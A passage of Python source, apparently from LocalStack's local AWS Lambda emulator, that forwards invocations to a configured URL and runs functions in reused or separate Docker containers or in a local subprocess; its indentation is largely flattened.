context.invocation_type,
)
return result
def _forward_to_url(
self,
forward_url: str,
lambda_function: LambdaFunction,
event: Union[Dict, bytes],
context: LambdaContext,
invocation_type: str,
) -> InvocationResult:
func_name = lambda_function.name()
url = "%s%s/functions/%s/invocations" % (forward_url, API_PATH_ROOT, func_name)
copied_env_vars = lambda_function.envvars.copy()
copied_env_vars["LOCALSTACK_HOSTNAME"] = config.HOSTNAME_EXTERNAL
copied_env_vars["LOCALSTACK_EDGE_PORT"] = str(config.EDGE_PORT)
headers = aws_stack.mock_aws_request_headers("lambda")
headers["X-Amz-Region"] = lambda_function.region()
headers["X-Amz-Request-Id"] = context.aws_request_id
headers["X-Amz-Handler"] = lambda_function.handler
headers["X-Amz-Function-ARN"] = context.invoked_function_arn
headers["X-Amz-Function-Name"] = context.function_name
headers["X-Amz-Function-Version"] = context.function_version
headers["X-Amz-Role"] = lambda_function.role
headers["X-Amz-Runtime"] = lambda_function.runtime
headers["X-Amz-Timeout"] = str(lambda_function.timeout)
headers["X-Amz-Memory-Size"] = str(context.memory_limit_in_mb)
headers["X-Amz-Log-Group-Name"] = context.log_group_name
headers["X-Amz-Log-Stream-Name"] = context.log_stream_name
headers["X-Amz-Env-Vars"] = json.dumps(copied_env_vars)
headers["X-Amz-Last-Modified"] = str(int(lambda_function.last_modified.timestamp() * 1000))
headers["X-Amz-Invocation-Type"] = invocation_type
headers["X-Amz-Log-Type"] = "Tail"
if context.client_context:
headers["X-Amz-Client-Context"] = context.client_context
if context.cognito_identity:
headers["X-Amz-Cognito-Identity"] = context.cognito_identity
data = run_safe(lambda: to_str(event)) or event
data = json.dumps(json_safe(data)) if isinstance(data, dict) else str(data)
LOG.debug(
"Forwarding Lambda invocation to LAMBDA_FORWARD_URL: %s", config.LAMBDA_FORWARD_URL
)
result = safe_requests.post(url, data, headers=headers)
if result.status_code >= 400:
raise Exception(
"Received error status code %s from external Lambda invocation" % result.status_code
)
content = run_safe(lambda: to_str(result.content)) or result.content
LOG.debug(
"Received result from external Lambda endpoint (status %s): %s",
result.status_code,
content,
)
result = InvocationResult(content)
return result
def _forward_url(self, context: InvocationContext) -> str:
env_vars = context.lambda_function.envvars
return env_vars.get("LOCALSTACK_LAMBDA_FORWARD_URL") or config.LAMBDA_FORWARD_URL
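# Note: with LAMBDA_FORWARD_URL (or the per-function env var LOCALSTACK_LAMBDA_FORWARD_URL)
# set, the plugin above POSTs the JSON-serialized event to
# <forward_url><API_PATH_ROOT>/functions/<function-name>/invocations, passing the function
# metadata (handler, runtime, role, timeout, env vars, ...) in the X-Amz-* request headers
# built in _forward_to_url(); the HTTP response body becomes the invocation result.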
def handle_error(
lambda_function: LambdaFunction, event: Dict, error: Exception, asynchronous: bool = False
):
if asynchronous:
if get_record_from_event(event, "eventSource") == EVENT_SOURCE_SQS:
sqs_queue_arn = get_record_from_event(event, "eventSourceARN")
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
return sqs_error_to_dead_letter_queue(sqs_queue_arn, event, error)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(lambda_function, event, error)
class LambdaAsyncLocks:
locks: Dict[str, Union[threading.Semaphore, threading.Lock]]
creation_lock: threading.Lock
def __init__(self):
self.locks = {}
self.creation_lock = threading.Lock()
def assure_lock_present(
self, key: str, lock: Union[threading.Semaphore, threading.Lock]
) -> Union[threading.Semaphore, threading.Lock]:
with self.creation_lock:
return self.locks.setdefault(key, lock)
LAMBDA_ASYNC_LOCKS = LambdaAsyncLocks()
class LambdaExecutor(object):
"""Base class for Lambda executors. Subclasses must overwrite the _execute method"""
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, lambda_function: LambdaFunction):
# setup environment pre-defined variables for docker environment
result = lambda_function.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, lambda_function.region())
return result
def execute(
self,
func_arn: str, # TODO remove and get from lambda_function
lambda_function: LambdaFunction,
event: Dict,
context: LambdaContext = None,
version: str = None,
asynchronous: bool = False,
callback: Callable = None,
lock_discriminator: str = None,
):
# note: leave here to avoid circular import issues
from localstack.utils.aws.message_forwarding import lambda_result_to_destination
def do_execute(*args):
@cloudwatched("lambda")
def _run(func_arn=None):
with contextlib.ExitStack() as stack:
if lock_discriminator:
stack.enter_context(LAMBDA_ASYNC_LOCKS.locks[lock_discriminator])
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
invocation_type = "Event" if asynchronous else "RequestResponse"
inv_context = InvocationContext(
lambda_function,
event=event,
function_version=version,
context=context,
invocation_type=invocation_type,
)
try:
result = self._execute(lambda_function, inv_context)
except Exception as e:
raised_error = e
dlq_sent = handle_error(lambda_function, event, e, asynchronous)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(
result, func_arn, event, error=raised_error, dlq_sent=dlq_sent
)
lambda_result_to_destination(
lambda_function, event, result, asynchronous, raised_error
)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug(
"Lambda executed in Event (asynchronous) mode, no response will be returned to caller"
)
FuncThread(do_execute).start()
return InvocationResult(None, log_output="Lambda executed asynchronously.")
return do_execute()
def _execute(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
"""This method must be overwritten by subclasses."""
raise NotImplementedError
def startup(self):
"""Called once during startup - can be used, e.g., to prepare Lambda Docker environment"""
pass
def cleanup(self, arn=None):
"""Called once during startup - can be used, e.g., to clean up left-over Docker containers"""
pass
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
"""Make the given file available to the Lambda process (e.g., by copying into the container) for the
given invocation context; Returns the path to the file that will be available to the Lambda handler."""
raise NotImplementedError
def apply_plugin_patches(self, inv_context: InvocationContext) -> Optional[InvocationResult]:
"""Loop through the list of plugins, and apply their patches to the invocation context (if applicable)"""
invocation_results = []
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
# initialize, if not done yet
if not hasattr(plugin, "_initialized"):
LOG.debug("Initializing Lambda executor plugin %s", plugin.__class__)
plugin.initialize()
plugin._initialized = True
# invoke plugin to prepare invocation
inv_options = plugin.prepare_invocation(inv_context)
if not inv_options:
continue
if isinstance(inv_options, InvocationResult):
invocation_results.append(inv_options)
continue
# copy files
file_keys_map = {}
for key, file_path in inv_options.files_to_add.items():
file_in_container = self.provide_file_to_lambda(file_path, inv_context)
file_keys_map[key] = file_in_container
# replace placeholders like "{<fileKey>}" with corresponding file path
for key, file_path in file_keys_map.items():
for env_key, env_value in inv_options.env_updates.items():
inv_options.env_updates[env_key] = str(env_value).replace(
"{%s}" % key, file_path
)
if inv_options.updated_command:
inv_options.updated_command = inv_options.updated_command.replace(
"{%s}" % key, file_path
)
inv_context.lambda_command = inv_options.updated_command
# update environment
inv_context.environment.update(inv_options.env_updates)
# update handler
if inv_options.updated_handler:
inv_context.handler = inv_options.updated_handler
if invocation_results:
# TODO: This is currently non-deterministic! If multiple execution plugins attempt to return
# an invocation result right away, only the first one is returned. We need a more solid
# mechanism for conflict resolution if multiple plugins interfere!
if len(invocation_results) > 1:
LOG.warning(
"Multiple invocation results returned from "
"LambdaExecutorPlugin.prepare_invocation calls - choosing the first one: %s",
invocation_results,
)
return invocation_results[0]
def process_result_via_plugins(
self, inv_context: InvocationContext, invocation_result: InvocationResult
) -> InvocationResult:
"""Loop through the list of plugins, and apply their post-processing logic to the Lambda invocation result."""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
invocation_result = plugin.process_result(inv_context, invocation_result)
return invocation_result
class ContainerInfo:
"""Contains basic information about a docker container."""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
"""Abstract executor class for executing Lambda functions in Docker containers"""
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
raise NotImplementedError
def run_lambda_executor(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
env_vars = inv_context.environment
runtime = lambda_function.runtime or ""
event = inv_context.event
stdin_str = None
event_body = event if event is not None else env_vars.get("AWS_LAMBDA_EVENT_BODY")
event_body = json.dumps(event_body) if isinstance(event_body, dict) else event_body
event_body = event_body or ""
is_large_event = len(event_body) > MAX_ENV_ARGS_LENGTH
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if (
not is_large_event
and lambda_function
and is_provided
and env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1"
):
# Note: certain "provided" runtimes (e.g., Rust programs) can block if we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
"AWS_LAMBDA_EVENT_BODY": to_str(
event_body
), # Note: seems to be needed for provided runtimes!
"DOCKER_LAMBDA_USE_STDIN": "1",
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop("AWS_LAMBDA_COGNITO_IDENTITY", None)
if is_large_event:
# in case of very large event payloads, we need to pass them via stdin
LOG.debug(
"Received large Lambda event payload (length %s) - passing via stdin",
len(event_body),
)
env_vars["DOCKER_LAMBDA_USE_STDIN"] = "1"
if env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1":
stdin_str = event_body
if not is_provided:
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
elif "AWS_LAMBDA_EVENT_BODY" not in env_vars:
env_vars["AWS_LAMBDA_EVENT_BODY"] = to_str(event_body)
# apply plugin patches
result = self.apply_plugin_patches(inv_context)
if isinstance(result, InvocationResult):
return result
if config.LAMBDA_DOCKER_FLAGS:
inv_context.docker_flags = (
f"{config.LAMBDA_DOCKER_FLAGS} {inv_context.docker_flags or ''}".strip()
)
event_stdin_bytes = stdin_str and to_bytes(stdin_str)
error = None
try:
result, log_output = self.execute_in_container(
lambda_function,
inv_context,
stdin=event_stdin_bytes,
)
except ContainerException as e:
result = e.stdout or ""
log_output = e.stderr or ""
error = e
except InvocationException as e:
result = e.result or ""
log_output = e.log_output or ""
error = e
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
func_arn = lambda_function and lambda_function.arn()
log_lambda_result(func_arn, result, log_output)
# store log output - TODO get live logs from `process` above?
store_lambda_logs(lambda_function, log_output)
if error:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
) from error
# create result
invocation_result = InvocationResult(result, log_output=log_output)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
"""Return the event as a stdin string."""
# amend the environment variables for execution
environment["AWS_LAMBDA_EVENT_BODY"] = event_body
return event_body.encode()
def _execute(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
runtime = lambda_function.runtime
handler = lambda_function.handler
environment = inv_context.environment = self._prepare_environment(lambda_function)
event = inv_context.event
context = inv_context.context
# configure USE_SSL in environment
if config.USE_SSL:
environment["USE_SSL"] = "1"
# prepare event body
if not event:
LOG.info(
'Empty event body specified for invocation of Lambda "%s"', lambda_function.arn()
)
event = {}
event_body = json.dumps(json_safe(event))
event_bytes_for_stdin = self.prepare_event(environment, event_body)
inv_context.event = event_bytes_for_stdin
Util.inject_endpoints_into_env(environment)
environment["EDGE_PORT"] = str(config.EDGE_PORT)
environment[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
if os.environ.get("HTTP_PROXY"):
environment["HTTP_PROXY"] = os.environ["HTTP_PROXY"]
if lambda_function.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(lambda_function.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_COGNITO_IDENTITY"] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment["AWS_LAMBDA_CLIENT_CONTEXT"] = json.dumps(
to_str(base64.b64decode(to_bytes(context.client_context)))
)
# pass JVM options to the Lambda environment, if configured
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
if environment.get("JAVA_TOOL_OPTIONS"):
LOG.info(
"Skip setting LAMBDA_JAVA_OPTS as JAVA_TOOL_OPTIONS already defined in Lambda env vars"
)
else:
LOG.debug(
"Passing JVM options to container environment: JAVA_TOOL_OPTIONS=%s",
config.LAMBDA_JAVA_OPTS,
)
environment["JAVA_TOOL_OPTIONS"] = config.LAMBDA_JAVA_OPTS
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment["NODE_TLS_REJECT_UNAUTHORIZED"] = "0"
# run Lambda executor and fetch invocation result
LOG.info("Running lambda: %s", lambda_function.arn())
result = self.run_lambda_executor(lambda_function=lambda_function, inv_context=inv_context)
return result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
if config.LAMBDA_REMOTE_DOCKER:
LOG.info("TODO: copy file into container for LAMBDA_REMOTE_DOCKER=1 - %s", local_file)
return local_file
mountable_file = Util.get_host_path_for_path_in_docker(local_file)
_, extension = os.path.splitext(local_file)
target_file_name = f"{md5(local_file)}{extension}"
target_path = f"/tmp/{target_file_name}"
inv_context.docker_flags = inv_context.docker_flags or ""
inv_context.docker_flags += f"-v {mountable_file}:{target_path}"
return target_path
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
"""Executor class for executing Lambda functions in re-usable Docker containers"""
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
func_arn = lambda_function.arn()
lambda_cwd = lambda_function.cwd
runtime = lambda_function.runtime
env_vars = inv_context.environment
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars["_LAMBDA_SERVER_PORT"] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug(
'Priming docker container with runtime "%s" and arn "%s".',
runtime,
func_arn,
)
container_info = self.prime_docker_container(
lambda_function, dict(env_vars), lambda_cwd, inv_context.docker_flags
)
if not inv_context.lambda_command and inv_context.handler:
command = container_info.entry_point.split()
command.append(inv_context.handler)
inv_context.lambda_command = command
# determine files to be copied into the container
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
DOCKER_CLIENT.copy_into_container(
container_info.name, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER
)
lambda_docker_ip = DOCKER_CLIENT.get_container_ip(container_info.name)
if not self._should_use_stay_open_mode(lambda_docker_ip, check_port=True):
LOG.debug("Using 'docker exec' to run invocation in docker-reuse Lambda container")
# disable stay open mode for this one, to prevent starting runtime API server
env_vars["DOCKER_LAMBDA_STAY_OPEN"] = None
return DOCKER_CLIENT.exec_in_container(
container_name_or_id=container_info.name,
command=inv_context.lambda_command,
interactive=True,
env_vars=env_vars,
stdin=stdin,
)
inv_result = self.invoke_lambda(lambda_function, inv_context, lambda_docker_ip)
return (inv_result.result, inv_result.log_output)
def invoke_lambda(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
lambda_docker_ip=None,
) -> InvocationResult:
full_url = self._get_lambda_stay_open_url(lambda_docker_ip)
client = aws_stack.connect_to_service("lambda", endpoint_url=full_url)
event = inv_context.event or "{}"
LOG.debug(f"Calling {full_url} to run invocation in docker-reuse Lambda container")
response = client.invoke(
FunctionName=lambda_function.name(),
InvocationType=inv_context.invocation_type,
Payload=to_bytes(event),
LogType="Tail",
)
log_output = base64.b64decode(response.get("LogResult") or b"").decode("utf-8")
result = response["Payload"].read().decode("utf-8")
if "FunctionError" in response:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
)
return InvocationResult(result, log_output)
def _should_use_stay_open_mode(
self, lambda_docker_ip: Optional[str], check_port: bool = False
) -> bool:
"""Return whether to use stay-open execution mode - if we're running in Docker, the given IP
is defined, and if the target API endpoint is available (optionally, if check_port is True)."""
should_use = lambda_docker_ip and config.LAMBDA_STAY_OPEN_MODE
if not should_use or not check_port:
return should_use
full_url = self._get_lambda_stay_open_url(lambda_docker_ip)
return is_port_open(full_url)
def _get_lambda_stay_open_url(self, lambda_docker_ip: str) -> str:
return f"http://{lambda_docker_ip}:{STAY_OPEN_API_PORT}"
def _execute(self, func_arn: str, *args, **kwargs) -> InvocationResult:
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn: str = None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(
self,
lambda_function: LambdaFunction,
env_vars: Dict,
lambda_cwd: str,
docker_flags: str = None,
):
"""
Prepares a persistent docker container for a specific function.
:param lambda_function: The Details of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = lambda_function.arn()
container_name = self.get_container_name(func_arn)
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming Docker container (status "%s"): %s', status, container_name)
docker_image = Util.docker_image_for_lambda(lambda_function)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
# get container startup command and run it
LOG.debug("Creating container: %s", container_name)
self.create_container(lambda_function, env_vars, lambda_cwd, docker_flags)
if config.LAMBDA_REMOTE_DOCKER:
LOG.debug(
'Copying files to container "%s" from "%s".', container_name, lambda_cwd
)
DOCKER_CLIENT.copy_into_container(
container_name, "%s/." % lambda_cwd, DOCKER_TASK_FOLDER
)
LOG.debug("Starting docker-reuse Lambda container: %s", container_name)
DOCKER_CLIENT.start_container(container_name)
def wait_up():
cont_status = DOCKER_CLIENT.get_container_status(container_name)
assert cont_status == DockerContainerStatus.UP
if not in_docker():
return
# if we're executing in Docker using stay-open mode, additionally check if the target is available
lambda_docker_ip = DOCKER_CLIENT.get_container_ip(container_name)
if self._should_use_stay_open_mode(lambda_docker_ip):
full_url = self._get_lambda_stay_open_url(lambda_docker_ip)
wait_for_port_open(full_url, sleep_time=0.5, retries=8)
# give the container some time to start up
retry(wait_up, retries=15, sleep=0.8)
container_network = self.get_docker_container_network(func_arn)
entry_point = DOCKER_CLIENT.get_image_entrypoint(docker_image)
LOG.debug(
'Using entrypoint "%s" for container "%s" on network "%s".',
entry_point,
container_name,
container_network,
)
return ContainerInfo(container_name, entry_point)
def create_container(
self,
lambda_function: LambdaFunction,
env_vars: Dict,
lambda_cwd: str,
docker_flags: str = None,
):
docker_image = Util.docker_image_for_lambda(lambda_function)
container_name = self.get_container_name(lambda_function.arn())
# make sure we set LOCALSTACK_HOSTNAME
Util.inject_endpoints_into_env(env_vars)
# make sure AWS_LAMBDA_EVENT_BODY is not set (otherwise causes issues with "docker exec ..." above)
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
network = config.LAMBDA_DOCKER_NETWORK
additional_flags = docker_flags
dns = config.LAMBDA_DOCKER_DNS
mount_volumes = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if ":" in lambda_cwd and "\\" in lambda_cwd:
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volumes = [(lambda_cwd_on_host, DOCKER_TASK_FOLDER)] if mount_volumes else None
if os.environ.get("HOSTNAME"):
env_vars["HOSTNAME"] = os.environ.get("HOSTNAME")
env_vars["EDGE_PORT"] = config.EDGE_PORT
command = None
entrypoint = "/bin/bash"
interactive = True
if config.LAMBDA_STAY_OPEN_MODE:
env_vars["DOCKER_LAMBDA_STAY_OPEN"] = "1"
# clear docker lambda use stdin since not relevant with stay open
env_vars.pop("DOCKER_LAMBDA_USE_STDIN", None)
entrypoint = None
command = [lambda_function.handler]
interactive = False
LOG.debug(
"Creating docker-reuse Lambda container %s from image %s", container_name, docker_image
)
return DOCKER_CLIENT.create_container(
image_name=docker_image,
remove=True,
interactive=interactive,
detach=True,
name=container_name,
entrypoint=entrypoint,
command=command,
network=network,
env_vars=env_vars,
dns=dns,
mount_volumes=mount_volumes,
additional_flags=additional_flags,
)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug("Stopping container: %s", container_name)
DOCKER_CLIENT.stop_container(container_name)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug("Removing container: %s", container_name)
rm_docker_container(container_name, safe=True)
# clean up function invoke times, as some init logic depends on this
self.function_invoke_times.pop(func_arn, None)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug("Getting all lambda containers names.")
list_result = DOCKER_CLIENT.list_containers(
filter=f"name={self.get_container_prefix()}*"
)
container_names = list(map(lambda container: container["name"], list_result))
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug("Removing %d containers.", len(container_names))
for container_name in container_names:
DOCKER_CLIENT.remove_container(container_name)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
        :return: 1 if the container is running,
                 -1 if the container exists but is not running,
                 0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
container_status = DOCKER_CLIENT.get_container_status(container_name)
return container_status.value
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ""
# Get the container name.
container_name = self.get_container_name(func_arn)
container_network = DOCKER_CLIENT.get_network(container_name)
return container_network
def idle_container_destroyer(self):
"""
        Iterates through all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.debug("Checking if there are idle containers ...")
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
        Starts a repeating timer that re-invokes this method every 60 seconds,
        checking for idle containers and destroying them on each run.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_prefix(self) -> str:
"""
Returns the prefix of all docker-reuse lambda containers for this LocalStack instance
:return: Lambda container name prefix
"""
return f"{bootstrap.get_main_container_name()}_lambda_"
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return self.get_container_prefix() + re.sub(r"[^a-zA-Z0-9_.-]", "_", func_arn)
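    # Illustrative example (hypothetical ARN; assumes the main container is named "localstack_main"):
    #   arn:aws:lambda:us-east-1:000000000000:function:my-func
    #   -> "localstack_main_lambda_arn_aws_lambda_us-east-1_000000000000_function_my-func"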
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
# Tell Lambci to use STDIN for the event
environment["DOCKER_LAMBDA_USE_STDIN"] = "1"
return event_body.encode()
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
lambda_cwd = lambda_function.cwd
env_vars = inv_context.environment
entrypoint = None
if inv_context.lambda_command:
entrypoint = ""
elif inv_context.handler:
inv_context.lambda_command = inv_context.handler
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK or None
if network == "host":
port = get_free_tcp_port()
env_vars["DOCKER_LAMBDA_API_PORT"] = port
env_vars["DOCKER_LAMBDA_RUNTIME_PORT"] = port
additional_flags = inv_context.docker_flags or ""
dns = config.LAMBDA_DOCKER_DNS
docker_java_ports = PortMappings()
if Util.debug_java_port:
docker_java_ports.add(Util.debug_java_port)
docker_image = Util.docker_image_for_lambda(lambda_function)
if config.LAMBDA_REMOTE_DOCKER:
container_id = DOCKER_CLIENT.create_container(
image_name=docker_image,
interactive=True,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
ports=docker_java_ports,
command=inv_context.lambda_command,
)
DOCKER_CLIENT.copy_into_container(container_id, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER)
return DOCKER_CLIENT.start_container(
container_id, interactive=not background, attach=not background, stdin=stdin
)
else:
mount_volumes = None
if lambda_cwd:
mount_volumes = [
(Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
]
return DOCKER_CLIENT.run_container(
image_name=docker_image,
interactive=True,
detach=background,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
command=inv_context.lambda_command,
mount_volumes=mount_volumes,
stdin=stdin,
)
class LambdaExecutorLocal(LambdaExecutor):
# maps functionARN -> functionVersion -> callable used to invoke a Lambda function locally
FUNCTION_CALLABLES: Dict[str, Dict[str, Callable]] = {}
def _execute_in_custom_runtime(
self, cmd: Union[str, List[str]], lambda_function: LambdaFunction = None
) -> InvocationResult:
"""
Generic run function for executing lambdas in custom runtimes.
:param cmd: the command to execute
:param lambda_function: function details
:return: the InvocationResult
"""
env_vars = lambda_function and lambda_function.envvars
kwargs = {"stdin": True, "inherit_env": True, "asynchronous": True, "env_vars": env_vars}
process = run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate()
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
# TODO: not sure if this code is needed/used
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
func_arn = lambda_function and lambda_function.arn()
log_lambda_result(func_arn, result, log_output)
# store log output - TODO get live logs from `process` above?
# store_lambda_logs(lambda_function, log_output)
if return_code != 0:
raise InvocationException(
"Lambda process returned error status code: %s. Result: %s. Output:\n%s"
% (return_code, result, log_output),
log_output,
result,
)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def _execute(
self, lambda_function: LambdaFunction, inv_context: InvocationContext
) -> InvocationResult:
# apply plugin patches to prepare invocation context
result = self.apply_plugin_patches(inv_context)
if isinstance(result, InvocationResult):
return result
lambda_cwd = lambda_function.cwd
environment = self._prepare_environment(lambda_function)
if lambda_function.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(lambda_function.timeout)
context = inv_context.context
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_FUNCTION_MEMORY_SIZE"] = str(context.memory_limit_in_mb)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function_callable = self.get_lambda_callable(
lambda_function, qualifier=inv_context.function_version
)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
